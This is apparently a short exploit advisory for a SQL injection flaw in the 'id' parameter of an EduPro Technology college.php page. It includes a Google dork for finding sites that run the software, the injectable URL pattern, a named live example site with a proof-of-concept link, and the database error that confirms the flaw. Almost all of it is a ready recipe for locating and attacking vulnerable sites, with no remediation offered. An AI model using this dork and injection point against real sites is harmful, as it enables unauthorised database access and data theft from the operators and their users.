################################################################################################# # Exploit Title : Gettarget EduProTech © 2003-2016 EduPro Technology Pvt. Ltd. SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/07/2018 # Vendor Homepages : gettarget.com ~ eduprotech.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Description : EduPro Technology Pvt. Ltd. is a global products and app development company that has served more than onehundred businesses and industrial entities to help them reach their organizational goals most profitably. EduPro Technology providing solutions to every need of clients and also transforming business proposals into commercial practicalities. # Google Dork : intext:''© 2003-2016 EduPro Technology Pvt. Ltd.'' # Exploit : /DOMAINADDRESSNAME/medical/college.php?id=[SQL Inj] ################################################################################################# # Example Site => settarget.co/settarget/medical/college.php?id=472%27 => [ Proof of Concept ] => archive.is/v5gV4 # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 22 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################